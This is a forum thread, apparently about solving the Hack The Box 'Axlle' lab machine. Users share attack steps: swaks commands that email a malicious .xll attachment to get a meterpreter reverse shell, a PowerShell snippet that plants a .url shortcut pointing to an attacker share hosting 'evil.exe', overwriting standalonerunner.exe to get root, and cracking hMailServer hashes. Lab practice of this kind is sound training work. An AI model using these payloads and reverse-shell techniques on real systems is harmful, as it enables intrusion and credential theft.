[ritualist]

any hint for from app-devs to root ?

There is a thread with writeup.
Replace standalonerunner.exe

I used a standard meterpreter shell and overwrote the file every 5s. Also had to use an automigrate script.
I'm sure there is a more elegant way.

[bmoon10]

any hint for from app-devs to root ?

There is a thread with writeup.
Replace standalonerunner.exe

I used a standard meterpreter shell and overwrote the file every 5s. Also had to use an automigrate script.
I'm sure there is a more elegant way.

Elegant way perhaps the intended way - https://github.com/nasbench/Misc-Researc...eRunner.md

---

anyone know how to use the hMailServer creds once you get the password?

1. hMailServer administrator encrypted pass is not crackable but the sqlserver pass is.

2. you can download the hMailserver.sdf and use the right tools + password to login into the database

3. dump the SHA256 password hashes of mail account holders from the table

4. try to crack the SHA256 hash and with john / hashcat.

it might be a dead-end nevertheless exploring all the avenue is a good thing.

i tried using the sql creds everywhere but i don't gain access to anything, is it required to get the user flag? or is it all together just a dead end?

Its a subterfuge.

[princecyber]

For those who are still stuck at creating .xll file and get reverse shell
1. create a .dll file with msfvenom (google it )
2. ask chatgpt to give a script which converts .dll to .xll it will give a python script use that to get .xll
3. swaks --to accounts@axlle.htb --from cyberz@axlle.htb --server 10.129.232.91 --port 25 --header "Subject: test" --body "test" --attach @Poc.xll
4. set listener in msfconsol will get reverse shell after a minute
5. if it doesn't work reset machine and try again.

[maggi]

anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me

$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share

What is a payload of evil.exe could you share pls?

evil.exe is just a quickie placeholder name I use for msf payloads
windows/x64/meterpreter/reverse_tcp

[0x00b]

thx for sharing!

[osamy7593]

guys what for user flag

---

anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me

$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share

What is a payload of evil.exe could you share pls?

evil.exe is just a quickie placeholder name I use for msf payloads
windows/x64/meterpreter/reverse_tcp

bro this after gaining shell as whom?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Liy4]

i'm stucked with getting rev shell. I use
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll --server axlle.htb
but didnt get the rev shell . What is the error??

[osamy7593]

i get the password of mssql how to log in the database

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Pierluigi2497]

i'm stucked with getting rev shell. I use
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll --server axlle.htb
but didnt get the rev shell . What is the error??

I wasted a lot of time along this issue.
The problem is that you missed the @ symbol right before shell.xll.
If you crafted correctly the payload, this must help
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach @Shell.xll --server axlle.htb

[4rrows]

i'm stucked with getting rev shell. I use
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll --server axlle.htb
but didnt get the rev shell . What is the error??

Use --attach @Shell.xll it will work